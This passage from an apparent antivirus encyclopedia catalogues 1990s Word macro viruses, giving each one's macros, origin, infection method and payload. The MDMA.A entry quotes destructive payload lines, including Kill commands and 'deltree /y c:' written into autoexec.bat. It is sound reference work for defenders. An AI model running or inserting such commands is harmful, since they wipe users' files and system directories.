  20337.  
  20338. Hunter.B uses "ExtrasMakro" to make recognition of an infected
  20339. document more difficult (called macro stealth technique).
  20340.  
  20341. When Hunter.B triggers (probability of 1/60), it displays the
  20342. following message:
  20343.  
  20344. "   One - You lock the target   "
  20345. "   Two - You bait the line    "
  20346. "   Three - You slowly spread the net   "
  20347. "   And Four - You catch the man   "
  20348.  
  20349. Hunter.B uses language specific macros, therefore it only works
  20350. with the German version of Microsoft Word.
  20351.  
  20352.  
  20353. [WORD_Hunter.C:De (aka Headhunter V 3.5)]
  20354. Virus name: WORD_Hunter.C:De (aka Headhunter V 3.5)
  20355. Virus Type: Word macro virus
  20356. Number of macros: 3
  20357. Encrypted: Yes
  20358. Macro names: AutoOpen, DateiNeu, ExtrasMakro
  20359. Size of macros: Polymorphic
  20360. Place of origin: Germany
  20361. Date of origin: Spring 1997
  20362. Payload: Yes
  20363. Seen In-The-Wild: No
  20364. Description:
  20365.  
  20366. The main difference between this new variant and previous
  20367. Hunter viruses is that Hunter.C adds text to its macros,
  20368. therefore making it a polymorphic virus.
  20369.  
  20370. Hunter.C uses the same "ExtrasMakro" from variant A and B
  20371. to make recognition of an infected document more difficult
  20372. (called macro stealth technique).
  20373.  
  20374. Hunter.C uses language specific macros, therefore it only
  20375. works with the German version of Microsoft Word.
  20376.  
  20377.  
  20378.  
  20379. [WORD_Hybrid.A]
  20380. Virus name: WORD_Hybrid.A
  20381. Virus Type: Word macro virus
  20382. Alias: WORD_Achtung
  20383. Number of Variants: 8
  20384. Number of macros: 3
  20385. Encrypted: Yes
  20386. Macro names: AutoOpen, AutoClose, FileSaveAs
  20387. Size of macros: 2815 Bytes
  20388. Place of origin: Unknown
  20389. Date of origin: January 1997
  20390. Destructive: No
  20391. Common In-The-Wild: Yes
  20392. Description:
  20393.  
  20394. As the name suggests, the Hybrid virus is a combination of a
  20395. virus with a macro anti-virus solution.
  20396.  
  20397. Its "AutoClose" macro has been snatched from a well-known,
  20398. yet ineffective, anti-virus solution called ScanProt (written by
  20399. Microsoft).
  20400.  
  20401. Hybrid activates when an infected document in opened.
  20402. Further documents become infected when they are saved with
  20403. the "FileSaveAs" command.
  20404.  
  20405. Hybrid has been found In-the-Wild and can be
  20406. detected/disinfected with any better anti-virus solution.
  20407.  
  20408.  
  20409.  
  20410. [WORD_Achtung]
  20411. Virus name: WORD_Achtung
  20412. Virus Type: Word macro virus
  20413. Alias: WORD_Hybrid.A
  20414. Number of Variants: 8
  20415. Number of macros: 3
  20416. Encrypted: Yes
  20417. Macro names: AutoOpen, AutoClose, FileSaveAs
  20418. Size of macros: 2815 Bytes
  20419. Place of origin: Unknown
  20420. Date of origin: January 1997
  20421. Destructive: No
  20422. Common In-The-Wild: Yes
  20423. Description:
  20424.  
  20425. The Achtung virus is a combination of a virus and a macro anti-
  20426. virus solution.
  20427.  
  20428. Its "AutoClose" macro has been snatched from a well-known,
  20429. yet ineffective, anti-virus solution called ScanProt (written by
  20430. Microsoft).
  20431.  
  20432. Achtung activates when an infected document in opened.
  20433. Further documents become infected when they are saved with
  20434. the "FileSaveAs" command.
  20435.  
  20436. Achtung has been found In-the-Wild and can be detected/
  20437. disinfected with any better anti-virus solution.
  20438.  
  20439.  
  20440. [WORD_Hybrid.B]
  20441. Virus name: WORD_Hybrid.B
  20442. Virus Type: Word macro virus
  20443. Number of macros: 1
  20444. Encrypted: Yes
  20445. Macro names: AutoOpen, AutoClose, FileSaveAs
  20446. Size of macros:  2815 Bytes
  20447. Place of origin: Unknown
  20448. Date of origin: February 1997
  20449. Destructive: No
  20450. Common In-The-Wild: No
  20451. Description:
  20452.  
  20453. Hybrid.B is a new variant based on the original Hybrid.A
  20454. virus. The only difference between the two viruses is that the
  20455. "AutoClose" macro, snatched from the anti-virus macro
  20456. solution ScanProt, is corrupted. Due to this corruption Microsoft
  20457. Word displays a WordBasic error message whenever a document is closed.
  20458.  
  20459. "Unknown Command, Subroutine or Function"
  20460.  
  20461. For additional information, please refer to the Hybrid.A virus
  20462. description.
  20463.  
  20464.  
  20465. [WORD_Hybrid.C]
  20466. Virus name: WORD_Hybrid.C
  20467. Virus Type: Word macro virus
  20468. Number of macros: 3
  20469. Encrypted: Yes
  20470. Macro names: AutoOpen, AutoClose, FileSaveAs
  20471. Size of macros: 2815 Bytes
  20472. Place of origin: Unknown
  20473. Date of origin: Spring 1997
  20474. Destructive: No
  20475. Common In-The-Wild: No
  20476. Description:
  20477.  
  20478. Hybrid.C is a new variant based on the original Hybrid.A
  20479. virus.  The only difference between the two viruses is that the
  20480. "AutoClose" macro, snatched from the anti-virus macro
  20481. solution ScanProt, is corrupted. Due to this corruption Microsoft
  20482. Word displays the following error message when a user tries to close
  20483. a file:
  20484.  
  20485. "   syntax error   "
  20486.  
  20487. For additional information, please refer to the Hybrid.A virus
  20488. description.
  20489.  
  20490.  
  20491. [WORD_Imposter.A]
  20492. Virus name: WORD_Imposter.A
  20493. Virus Type: Word macro virus
  20494. Number of macros: 2
  20495. Encrypted: No
  20496. Macro names: AutoClose, DMV (FileSaveAs)
  20497. Size of macros: 907 Bytes
  20498. Place of origin: England
  20499. Date of origin: March 1996
  20500. Destructive: No
  20501. Common In-The-Wild: Yes
  20502. Description:
  20503.  
  20504. Imposter infects the global template (normal.dot) when an
  20505. infected document is closed and the macros "DMV" and
  20506. "FileSaveAs" do not exist. When Imposter.A copies the "DMV" macro,
  20507. it renames it to "FileSaveAs" and displays the following message:
  20508.  
  20509. "   DMV   "
  20510.  
  20511. Further documents become infected when the "FileSaveAs"
  20512. command is used.
  20513.  
  20514. The following text can be found inside Imposter.A, but is not
  20515. displayed:
  20516.  
  20517. "   just to prove another point   "
  20518.  
  20519. This text is based on the Concept virus, which has "this is
  20520. enough to prove my point" in its virus code.
  20521.  
  20522.  
  20523. [WORD_Imposter.B]
  20524. Virus name: WORD_Imposter.B
  20525. Virus Type: Word macro virus
  20526. Number of macros: 2
  20527. Encrypted: No
  20528. Macro names: AutoClose, DMV (FileSaveAs)
  20529. Size of macros: 907 Bytes
  20530. Place of origin: England
  20531. Date of origin: March 1996
  20532. Destructive: No
  20533. Common In-The-Wild: No
  20534. Description:
  20535.  
  20536. The only difference between this new variant and the original
  20537. Imposter virus is the spelling of the comment in the virus code.
  20538.  
  20539. Please refer to Imposter.A for more information.
  20540.  
  20541.  
  20542. [WORD_Irish.A]
  20543. Virus name: WORD_Irish.A
  20544. Virus Type: Word macro virus
  20545. Number of macros: 4
  20546. Encrypted: No
  20547. Macro names: AutoOpen, WordHelp, AntiVirus, WordHelpNT
  20548. Size of macros: 4152 Bytes
  20549. Place of origin: USA
  20550. Date of origin: Spring 1996
  20551. Destructive: No
  20552. Common In-The-Wild: No
  20553. Description:
  20554.  
  20555. Irish infects the global template (normal.dot) when an infected
  20556. document is opened. Further documents become infected when
  20557. the "FileSave" command is used.
  20558.  
  20559. Two of the macros, "WordHelp" and "WordHelpNT", do not
  20560. run automatically. However, when executed manually by the
  20561. user, they will change the Windows desktop color to green.
  20562.  
  20563. The macro "WordHelpNT" contains a payload which attempts
  20564. to activate the screen saver and display the following
  20565. message:
  20566.  
  20567. "   Happy Saint Patties Day   "
  20568.  
  20569. However the payload seems to be faulty and does not work
  20570. under Windows 95 (Irish only exists in Microsoft Word).
  20571.  
  20572.  
  20573. [WORD_Italian.A]
  20574. Virus name:  WORD_Italian.A
  20575. Virus Type: Word macro virus
  20576. Number of macros: 3
  20577. Encrypted: Yes
  20578. Macro names: FileMacro, FileChiudi, FileEsci, FileSalva,
  20579.              WordMacro1, WordMacro2
  20580. Size of macros: 1438 Bytes
  20581. Place of origin: Italy
  20582. Date of origin: January 1996
  20583. Destructive: No
  20584. Seen In-The-Wild: No
  20585. Description:
  20586.  
  20587. Italian is the first functional virus written for the Italian version
  20588. of Microsoft Word.
  20589.  
  20590. When an infected document is opened on the 7th, 13th, 17th
  20591. or 31st of each month it displays the following message:
  20592.  
  20593. "   Your PC is infected by   "
  20594. "   WORD_Macro.ITALIAN Virus   "
  20595. "   Written Jan,1996.   "
  20596.  
  20597.  
  20598. [WORD_Johnny.A(GoJohnny)]
  20599. Virus name: WORD_Johnny.A (GoJohnny)
  20600. Virus Type: Word macro virus
  20601. Number of macros: 5 or 6
  20602. Encrypted: Yes, 4/5 or 5/6
  20603. Macro names: Presentv, AutoOpen, Presentw, FileSaveAs. Presentz,
  20604.              FileSave, vGojohnny
  20605. Size of macros:  3393 Bytes in .doc files
  20606.                  4955 Bytes in global template
  20607. Place of origin: Unknown
  20608. Date of origin: Unknown
  20609. Payload: Yes
  20610. Seen In-The-Wild: No
  20611. Description:
  20612.  
  20613. Johnny infects the global template (normal.dot) when an
  20614. infected file is opened. Further documents become infected
  20615. when they are saved with the "FileSave" or "FileSaveAs"
  20616. command.
  20617.  
  20618. When Johhny triggers it creates a new document with the
  20619. following text:
  20620.  
  20621. "   NAIPESVOH REHM   "
  20622.  
  20623. After that it puts the following message on the status bar:
  20624.  
  20625. "   Starting Autosave   "
  20626.  
  20627. To make recognition of an infection more difficult, Johnny
  20628. turns off the prompting of Word before it infects the global
  20629. template.
  20630.  
  20631.  
  20632. [WORD_Johnny.B]
  20633. Virus name: WORD_Johnny.B
  20634. Virus Type: Word macro virus
  20635. Number of macros: 5 (or 6)
  20636. Encrypted: Yes
  20637. Macro names: AutoOpen, Presentv, Presentw, Presentz,
  20638.              vGoJohnny
  20639. Size of macros: 3992 Bytes
  20640. Place of origin: UK
  20641. Date of origin:  January 1997
  20642. Payload: Yes
  20643. Common In-The-Wild: No
  20644. Description:
  20645.  
  20646. The difference between this new variant and the original
  20647. Johnny.A virus is that Johnny.B is now able to infect the
  20648. French version of Microsoft Word.
  20649.  
  20650. The following 2 macros are changed:
  20651.  
  20652. "FichierEnregistre" instead of "FileSave" and "FichierEnregistreSous"
  20653. instead of "FileSaveAs".
  20654.  
  20655. For more information, please refer to the Johnny.A virus description.
  20656.  
  20657.  
  20658. [WORD_Kerrang.A]
  20659. Virus name: WORD_Kerrang.A
  20660. Virus Type: Word macro virus
  20661. Number of macros: 5
  20662. Encrypted: Yes
  20663. Macro names: AutoExec, FileOpen, FileSaveAs, FilePrintDefault,
  20664.              ToolsMacro
  20665. Size of macros: 972 Bytes
  20666. Place of origin: Unknown
  20667. Date of origin: February 1997
  20668. Destructive: Yes
  20669. Common In-The-Wild: No
  20670. Description:
  20671.  
  20672. Kerrang activates when an infected document is opened. After
  20673. the global template becomes infected, it disables the Microsoft
  20674. Word virus protection every time Microsoft Word is started
  20675. (AutoExec).
  20676.  
  20677. Further documents become infected when they are saved with
  20678. the FileSave and FileSaveAs commands.
  20679.  
  20680. Kerrang uses "ToolsMacro" to make recognition of an infected
  20681. file more difficult (called macro stealth technique). When the
  20682. user selects this option, Kerrang creates 65 new documents.
  20683.  
  20684. Kerrang has various payloads. It checks for the system time
  20685. and if the time is 18:00 (6:00 p.m.) is adds the following text
  20686. to the printed document:
  20687.  
  20688. "   Kerbaffely Urgo Kerranga! Kerranga!!!!   "
  20689.  
  20690. After that it launches its second payload which deletes all files
  20691. with the extension *.DOC in the current directory.
  20692.  
  20693.  
  20694. [WORD_KillDll.A]
  20695. Virus name: WORD_KillDll.A
  20696. Virus Type: Word macro virus
  20697. Number of macros: 1
  20698. Encrypted: No
  20699. Macro names: AutoOpen
  20700. Size of macros: 284 Bytes
  20701. Place of origin: Unknown
  20702. Date of origin:  Summer 1996
  20703. Destructive: Yes
  20704. Common In-The-Wild: No
  20705. Description:
  20706.  
  20707. KillDLL activates when an infected document is opened
  20708. (AutoOpen).
  20709.  
  20710. KillDLL is one of the very few destructive viruses. Upon each
  20711. startup of Word, it will delete all files in the WINDOWS
  20712. directory, matching the extensions:
  20713.  
  20714.   *.D??
  20715.  
  20716. Affected are mostly .DLL files and .DRV files, which are
  20717. essential for Microsoft Windows.
  20718.  
  20719.  
  20720. [WORD_KillPort.A]
  20721. Virus name: WORD_KillProt.A
  20722. Virus Type: Word macro virus
  20723. Number of macros: 4
  20724. Encrypted: Yes
  20725. Macro names: AutoExec, FileOpen, FileSaveAs, ToolsMacro
  20726. Size of macros: 2272 Bytes
  20727. Place of origin: Unknown
  20728. Date of origin: 1997
  20729. Payload: Yes
  20730. Common In-The-Wild: No
  20731. Description:
  20732.  
  20733. KillProt.A infects the global template when an infected
  20734. document is opened (FileOpen) or the ToolsMacro command
  20735. is selected. Further documents become infected when they
  20736. are opened (FileOpen) or saved (FileSaveAs).
  20737.  
  20738. KillProt's name was chosen because KillProt deletes the
  20739. following macros:
  20740.  
  20741. "AutoExit"
  20742. "InstVer"
  20743. "ShellOpen"
  20744.  
  20745. All of them are located in the anti-virus macro solution
  20746. "ScanProt".
  20747.  
  20748. KillProt also modifies .INI settings in the Windows directory.
  20749. It creates the entry "Count=xxx" under the "Infector" section.
  20750. Whenever a document is saved with the FileSaveAs command,
  20751. KillProt increments the value. The payload triggers whenever
  20752. 10 documents have been saved. It then adds the following
  20753. password to the saved document:
  20754.  
  20755. "   WhatTheHell   "
  20756.  
  20757.  
  20758. [WORD_MVDK1(Kit)]
  20759. Virus Kit Name: WORD_MVDK1 (Kit)
  20760. Virus Type: Word macro virus
  20761. Size of document: 23618 Bytes
  20762. Number of macros: 5
  20763. Place of origin: Russia
  20764. Date of origin: Summer 1996
  20765. Description:
  20766.  
  20767. MVDK does not generate ready-to-run viruses. It only creates
  20768. the source code, which is put into text format and saved in the
  20769. C:\ directory. Infected documents have to be created by the author
  20770. himself.
  20771.  
  20772. The function to infect the global template and documents is
  20773. placed in one main macro, named by the virus creator.
  20774. The AutoOpen macro is always present, while other infection
  20775. methods can be added (infection on FileOpen, FileNew and
  20776. FileSave).
  20777.  
  20778. MVDK offers various payloads:
  20779.  
  20780. 1. deleting system files
  20781.  
  20782. 2. saving files with a password (on certain date and time)
  20783.  
  20784. 3. dropping a DOS based program (or virus)
  20785.  
  20786. As a result of the payloads, "FileSaveAs" and "PayLoad" can
  20787. also be present in the virus code.
  20788.  
  20789.  
  20790. [WORD_Kompu.A]
  20791. Virus name: WORD_Kompu.A
  20792. Virus Type: Word macro virus
  20793. Alias: WORD_MakroKompu
  20794. Number of macros: 2
  20795. Encrypted: No
  20796. Macro names: AutoOpen, AutoClose
  20797. Size of macros: 517 Bytes
  20798. Place of origin: ?Russia?
  20799. Date of origin: Unknown
  20800. Payload: Yes
  20801. Seen In-The-Wild: No
  20802. Description:
  20803.  
  20804. Kompu infects the global template (normal.dot) when an
  20805. infected document is opened. Further documents become
  20806. infected when they are opened or closed.
  20807.  
  20808. On the 6th and 8th of each month, Kompu displays the
  20809. following message:
  20810.  
  20811. "   Tahan kommi!, Mul on paha tuju!   "
  20812.  
  20813. It then waits for an input from the user. To close the message
  20814. box, the user needs to enter the following text:
  20815.  
  20816. "   komm   "
  20817.  
  20818. Kompu also adds the following message to a printed
  20819. document:
  20820.  
  20821. "   Naemm-Naemm-Naemm-Naemm-Amps-Amps-Amps-
  20822.     Amps-Kloemps-Kroeoek!   "
  20823.  
  20824.  
  20825. [WORD8_MakroKompu]
  20826. Virus name: WORD_MakroKompu
  20827. Virus Type: Word macro virus
  20828. Alias: WORD_Kompu.A
  20829. Platform: Office 97
  20830. Number of macros: 2
  20831. Encrypted: No
  20832. Macro names: AutoOpen, AutoClose
  20833. Size of macros: 517 Bytes
  20834. Place of origin: ?Russia?
  20835. Date of origin: Unknown
  20836. Payload: Yes
  20837. Seen In-The-Wild: No
  20838. Description:
  20839.  
  20840. Kompu infects the global template (normal.dot) when an
  20841. infected document is opened. Further documents become
  20842. infected when they are opened or closed.
  20843.  
  20844. On the 6th and 8th of each month, Kompu displays the
  20845. following message:
  20846.  
  20847. "   Tahan kommi!, Mul on paha tuju!   "
  20848.  
  20849. It then waits for an input from the user. To close the message
  20850. box, the user needs to enter the following text:
  20851.  
  20852. "   komm   "
  20853.  
  20854. Kompu also adds the following message to a printed
  20855. document:
  20856.  
  20857. "   Naemm-Naemm-Naemm-Naemm-Amps-Amps-Amps-
  20858.     Amps-Kloemps-Kroeoek!   "
  20859.  
  20860.  
  20861.  
  20862. [WORD_Lazy.A]
  20863. Virus name: WORD_Lazy.A
  20864. Virus Type: Word macro virus
  20865. Number of macros: 2
  20866. Encrypted: Yes
  20867. Macro names: AutoOpen, Lazy
  20868. Size of macros: 664 Bytes
  20869. Place of origin: Unknown
  20870. Date of origin: Spring 1997
  20871. Payload: Yes
  20872. Seen In-The-Wild: No
  20873. Description:
  20874.  
  20875. Lazy infects the global template when an infected document is
  20876. opened. Further documents become infected when they are also
  20877. opened (AutoOpen).
  20878.  
  20879. When Lazy triggers (Friday 13th), it sets a password to the
  20880. active document.
  20881.  
  20882. If you find a document with an unknown password, please
  20883. download a copy of WinWord Password Recovery Tool
  20884. (wwprt). It is available at: www.vdsarg.cow.
  20885.  
  20886.  
  20887. [WORD_Lemon.A (aka Melon)]
  20888. Virus name: WORD_Lemon.A (aka Melon)
  20889. Virus Type: Word macro virus
  20890. Number of macros: 2
  20891. Encrypted: Yes
  20892. Macro names: AutoOpen, Lemon (Melon)
  20893. Size of macros: 664 Bytes
  20894. Place of origin: Unknown
  20895. Date of origin: Spring 1997
  20896. Payload: Yes
  20897. Seen In-The-Wild: No
  20898. Description:
  20899.  
  20900. Lemon.A infects the global template when an infected
  20901. document is opened. Further documents become infected
  20902. when they are also opened (AutoOpen).
  20903.  
  20904. When Lemon triggers (probability of 1/31), it displays the
  20905. following message:
  20906.  
  20907. "   !!LEMON!!!!MELON!!   "
  20908. "   !!LEMON!!!!MELON!!   "
  20909.  
  20910.  
  20911. [WORD_Lemon.B]
  20912. Virus name: WORD_Lemon.B
  20913. Virus Type: Word macro virus
  20914. Number of macros: 1
  20915. Encrypted: Yes
  20916. Macro names: AutoOpen
  20917. Size of macros: 577 Bytes
  20918. Place of origin: Unknown
  20919. Date of origin: Spring 1997
  20920. Payload: No
  20921. Seen In-The-Wild: No
  20922. Description:
  20923.  
  20924. Lemon.B infects the global template when an infected
  20925. document is opened. Further documents become infected
  20926. when they are also opened (AutoOpen).
  20927.  
  20928. Lemon.B removes "ExtrasMakro" to make recognition of an
  20929. infected document more difficult (called macro stealth
  20930. technique).
  20931.  
  20932.  
  20933. [WORD_Lunch.A]
  20934. Virus name: WORD_Lunch.A
  20935. Virus Type: Word macro virus
  20936. Alias: WORD_Nch
  20937. Number of Variants: 10
  20938. Number of macros: 3
  20939. Encrypted: No
  20940. Macro names: AutoOpen (FileSave), NEWAO, NEWFS
  20941. Size of macros: 1579 Bytes in .doc files
  20942.                 1718 Bytes in global template
  20943. Place of origin: Unknown
  20944. Date of origin: Unknown
  20945. Destructive: No
  20946. Seen In-The-Wild: No
  20947. Description:
  20948.  
  20949. Lunch infects the global template (normal.dot) when an
  20950. infected document is opened. The "AutoOpen" macro is
  20951. renamed to "FileSave" when Lunch infects the global
  20952. template. As a result, further documents become infected
  20953. when they are saved with the FileSave command.
  20954.  
  20955. When an infected document is saved at 12:01 pm, Lunch
  20956. displays the following message:
  20957.  
  20958. "   !Whatya doin'here? Take a lunch break!   "
  20959.  
  20960.  
  20961.  
  20962. [WORD_Nch]
  20963. Virus name: WORD_Nch
  20964. Virus Type: Word macro virus
  20965. Alias: WORD_Lunch.A
  20966. Number of Variants: 10
  20967. Number of macros: 3
  20968. Encrypted: No
  20969. Macro names: AutoOpen (FileSave), NEWAO, NEWFS
  20970. Size of macros: 1579 Bytes in .doc files
  20971.                 1718 Bytes in global template
  20972. Place of origin: Unknown
  20973. Date of origin: Unknown
  20974. Destructive: No
  20975. Seen In-The-Wild: No
  20976. Description:
  20977.  
  20978. Nch infects the global template (normal.dot) when an
  20979. infected document is opened. The "AutoOpen" macro is
  20980. renamed to "FileSave" when Nch infects the global
  20981. template. As a result, further documents become infected
  20982. when they are saved with the FileSave command.
  20983.  
  20984. When an infected document is saved at 12:01 pm, Nch
  20985. displays the following message:
  20986.  
  20987. "   !Whatya doin'here? Take a lunch break!   "
  20988.  
  20989.  
  20990. [WORD_Lunch.B]
  20991. Virus name: WORD_Lunch.B
  20992. Virus Type: Word macro virus
  20993. Number of macros: 3
  20994. Encrypted: No
  20995. Macro names: AutoOpen (FileSave), NEWAO, NEWFS
  20996. Size of macros: 1375 Bytes in .doc files
  20997.                 1463 Bytes in global template
  20998. Place of origin: Unknown
  20999. Date of origin: Unknown
  21000. Destructive: No
  21001. Seen In-The-Wild: No
  21002. Description:
  21003.  
  21004. The difference between this new variant and the original
  21005. Lunch.A virus is that Lunch.B does not check for the presence
  21006. of the "FileOpen" and "AutoExit" macros. Instead it checks for
  21007. the presence of the "FileSave" macro before infecting the
  21008. global template (normal.dot).
  21009.  
  21010. For more information, please refer to the Lunch.A virus.
  21011.  
  21012.  
  21013. [WORD_Maddog.A]
  21014. Virus name: WORD_Maddog.A
  21015. Virus Type: Word macro virus
  21016. Number of macros: 6
  21017. Encrypted: No
  21018. Macro names: AutoOpen, AutoClose, AutoExec, FileClose,
  21019.              AopnFinish, FcFinish
  21020. Size of macros: 4209 Bytes
  21021. Place of origin: Unknown
  21022. Date of origin: 1996
  21023. Destructive: Yes
  21024. Common In-The-Wild: No
  21025. Description:
  21026.  
  21027. MadDog.A infects the global template (normal.dot) when an
  21028. infected document is opened. Further documents become
  21029. infected when they are opened and closed (FileClose). Upon
  21030. closing a document, MadDog.A saves various times to
  21031. "Temp.dot" and then saves the active document. It also
  21032. creates the following file in the active directory:
  21033.  
  21034. "   Filename.dat   "
  21035.  
  21036. When a user closes a document (AutoClose) between 8 and 9
  21037. PM, Maddog.A replaces the letter "e" with "a".
  21038.  
  21039.  
  21040. [WORD_Maddog.B]
  21041. Virus name: WORD_Maddog.B
  21042. Virus Type: Word macro virus
  21043. Number of macros: 6
  21044. Encrypted: No
  21045. Macro names: AutoOpen, AutoClose, AutoExec, FileClose,
  21046.              AopnFinish, FcFinish
  21047. Size of macros: 4259 Bytes
  21048. Place of origin: Unknown
  21049. Date of origin: 1996
  21050. Destructive: Yes
  21051. Common In-The-Wild: Yes
  21052. Description:
  21053.  
  21054. The difference between this new variant and the original
  21055. Maddog.A virus is that the code has been slightly modified.
  21056.  
  21057. MadDog.B infects the global template (normal.dot) when an
  21058. infected document is opened. Further documents become
  21059. infected when they are opened and closed (FileClose). Upon
  21060. closing a document, MadDog.B saves various times to
  21061. "Temp.dot" and then saves the active document. It also
  21062. creates the following file in the active directory:
  21063.  
  21064. "   Filename.dat   "
  21065.  
  21066. When a user closes a document (AutoClose) between 8 and 9
  21067. PM, Maddog.B replaces the letter "e" with "a".
  21068.  
  21069.  
  21070. [WORD_MDMA.A (a.k.a. StickyKeys, MDMA_DMV)]
  21071. Virus name: WORD_MDMA.A (a.k.a. StickyKeys, MDMA_DMV)
  21072. Virus Type: Word macro virus
  21073. Number of macros: 1
  21074. Encrypted: No
  21075. Macro names: AutoClose
  21076. Size of macros: 1635 Bytes
  21077. Place of origin: USA
  21078. Date of origin: July 1996
  21079. Destructive: Yes
  21080. Common In-The-Wild: Yes
  21081. Description:
  21082.  
  21083. MDMA is the first macro virus that tries to work on Windows,
  21084. Windows 95, Macintosh and Windows NT. It can be a very
  21085. destructive virus, and Word users are strongly advised to
  21086. check their system with an up-to-date anti-virus program.
  21087.  
  21088. MDMA infects the global template (normal.dot) when an
  21089. infected document is opened and then closed. Further
  21090. documents become infected when they are closed ("AutoClose").
  21091.  
  21092. If an infected document is loaded on the first of each month,
  21093. MDMA activates its destructive payload. Due to a bug in the
  21094. code MDMA will always call the Windows 95 payload, even
  21095. though there are other payloads for other operating systems.
  21096. Below are all the payloads:
  21097.  
  21098. Windows:
  21099. --------
  21100. Kill "c:\shmk."; "deltree /y c:" is added to autoexec.bat
  21101.  
  21102. This will delete all the directories on the C:\ drive.
  21103.  
  21104. Windows NT:
  21105. -----------
  21106. Kill "*.*"; Kill "c:\shmk."
  21107.  
  21108. This will delete all the files on the C:\ drive
  21109.  
  21110. Macintosh:
  21111. ----------
  21112. Kill MacID$("****")
  21113.  
  21114. This will delete all files on the hard drive.
  21115.  
  21116. Windows 95:
  21117. -----------
  21118. Kill "c" \shmk."; Kill "c:\windows\*.hlp";
  21119. Kill "c:\windows\system\*.cpl"
  21120. SetPrivateProfileString ("HKEY_CURRENT_USER\Control
  21121. Panel\Accessibility\Stickykeys", "On", "1", "")
  21122. SetPrivateProfileString
  21123. ("HKEY_LOCAL_MACHINE\Network\Logon","ProcessLoginScript", "00","")
  21124. SetPrivateProfileString ("HKEY_CURRENT_USER\Control
  21125. Panel\Accessibility\HighContrst", "On", "1", "")
  21126.  
  21127. This will delete important Windows files.
  21128.  
  21129. MDMA will also display the following message:
  21130.  
  21131. "  You are infected with MDMA_DMV. Brought to you by MDMA   "
  21132. "         (Many Delinquent Modern Anarchists).   "
  21133.  
  21134.  
  21135.  
  21136. [WORD_MDMA.B (a.k.a. StickyKeys, MDMA_DMV)]
  21137. Virus name: WORD_MDMA.B (a.k.a. StickyKeys, MDMA_DMV)
  21138. Virus Type: Word macro virus
  21139. Number of macros: 1
  21140. Encrypted: Yes
  21141. Macro names: AutoClose
  21142. Size of macros: 1635 Bytes
  21143. Place of origin: USA
  21144. Date of origin: 1996
  21145. Destructive: No
  21146. Common In-The-Wild: No
  21147. Description:
  21148.  
  21149. The main difference between this new variant and the older
  21150. MDMA.A virus is that its payload is corrupted.
  21151. Microsoft Word does not care about corrupted macros,
  21152. therefore MDMA.B is still able to replicate.
  21153.  
  21154. MDMA.B infects the global template (normal.dot) when an
  21155. infected document is opened and then closed. Further
  21156. documents become infected when they are closed ("AutoClose").
  21157.  
  21158.  
  21159. [WORD_MDMA.C (a.k.a. StickyKeys, MDMA_DMV)]
  21160. Virus name: WORD_MDMA.C (a.k.a. StickyKeys, MDMA_DMV)
  21161. Virus Type: Word macro virus
  21162. Alias: WORD_Shmk
  21163. Number of Variants: 13
  21164. Number of macros: 1
  21165. Encrypted: No
  21166. Macro names: AutoClose
  21167. Size of macros: 1025 Bytes
  21168. Place of origin: USA
  21169. Date of origin: October 1996
  21170. Destructive: Yes
  21171. Common In-The-Wild: No
  21172. Description:
  21173.  
  21174. The main difference between this new variant and the older
  21175. MDMA.A virus is that the code was partially modified.
  21176.  
  21177. MDMA.C infects the global template (normal.dot) when an
  21178. infected document is opened and then closed. Further
  21179. documents become infected when they are closed ("AutoClose").
  21180.  
  21181. Upon closing a document after the 20th of each month,
  21182. MDMA.C triggers its destructive payload. It tries to delete the
  21183. following files:
  21184.  
  21185. C:\shmk.
  21186. all *.hlp (Help) files in the C:\Windows directory
  21187. all *.cpl files in the C:\Windows\System directory
  21188.  
  21189. Again, MDMA.C has a payload for the Macintosh, which is
  21190. never executed.
  21191.  
  21192.  
  21193. [WORD_Shmk]
  21194. Virus name: WORD_Shmk
  21195. Virus Type: Word macro virus
  21196. Alias: WORD_MDMA.C/D/E/M
  21197. Number of Variants: 13
  21198. Number of macros: 1
  21199. Encrypted: No
  21200. Macro names: AutoClose
  21201. Size of macros: 1025 Bytes
  21202. Place of origin: USA
  21203. Date of origin: October 1996
  21204. Destructive: Yes
  21205. Common In-The-Wild: No
  21206. Description:
  21207.  
  21208. Shmk infects the global template (normal.dot) when an
  21209. infected document is opened and then closed. Further
  21210. documents become infected when they are closed ("AutoClose").
  21211.  
  21212. Upon closing a document after the 20th of each month,
  21213. Shmk triggers its destructive payload. It tries to delete the
  21214. following files:
  21215.  
  21216. C:\shmk.
  21217. all *.hlp (Help) files in the C:\Windows directory
  21218. all *.cpl files in the C:\Windows\System directory
  21219.  
  21220. Again, Shmk has a payload for the Macintosh, which is
  21221. never executed.
  21222.  
  21223.  
  21224. [WORD_MDMA.D (a.k.a. StickyKeys, MDMA_DMV)]
  21225. Virus name: WORD_MDMA.D (a.k.a. StickyKeys, MDMA_DMV)
  21226. Virus Type: Word macro virus
  21227. Number of macros: 1
  21228. Encrypted: No
  21229. Macro names: AutoClose
  21230. Size of macros: 744 Bytes
  21231. Place of origin: USA
  21232. Date of origin: October 1996
  21233. Destructive: No
  21234. Common In-The-Wild: Yes
  21235. Description:
  21236.  
  21237. The main difference between this new variant and the older
  21238. MDMA.C virus is that some of the codes are missing.
  21239.  
  21240. MDMA.D infects the global template (normal.dot) when an
  21241. infected document is opened and then closed. Further
  21242. documents become infected when they are closed ("AutoClose").
  21243.  
  21244. While MDMA.C tries to delete certain files after the 20th of
  21245. each month, MDMA.D does not contain this destructive
  21246. payload. It only has a payload for the Macintosh, which is
  21247. never executed.
  21248.  
  21249.  
  21250. [WORD_MDMA.E (a.k.a. StickyKeys, MDMA_DMV)]
  21251. Virus name: WORD_MDMA.E (a.k.a. StickyKeys, MDMA_DMV)
  21252. Virus Type: Word macro virus
  21253. Number of macros: 1
  21254. Encrypted: No
  21255. Macro names: AutoClose
  21256. Size of macros: 735 Bytes
  21257. Place of origin: USA
  21258. Date of origin: 1996
  21259. Destructive: No
  21260. Common In-The-Wild: No
  21261. Description:
  21262.  
  21263. The main difference between this new variant and the older MDMA.D
  21264. virus is that some of the codes are missing.
  21265.  
  21266. MDMA.E infects the global template (normal.dot) when an infected
  21267. document is opened and then closed. Further documents become
  21268. infected when they are closed ("AutoClose").
  21269.  
  21270. While some other MDMA variants contain destructive payloads, MDMA.E
  21271. does not delete any files.
  21272.  
  21273.  
  21274.  
  21275. [WORD_Mind.A (aka Puritan)]
  21276. Virus name: WORD_Mind.A (aka Puritan)
  21277. Virus Type: Word macro virus
  21278. Number of macros: 6 or 1
  21279. Encrypted: No
  21280. Macro names: AOB, FSAB, Retro, Puritan, FileSaveAs, ToolsMacro
  21281. Size of macros: 5415 (Mind.A) or 753 (Mind.A1)
  21282. Place of origin: Unknown
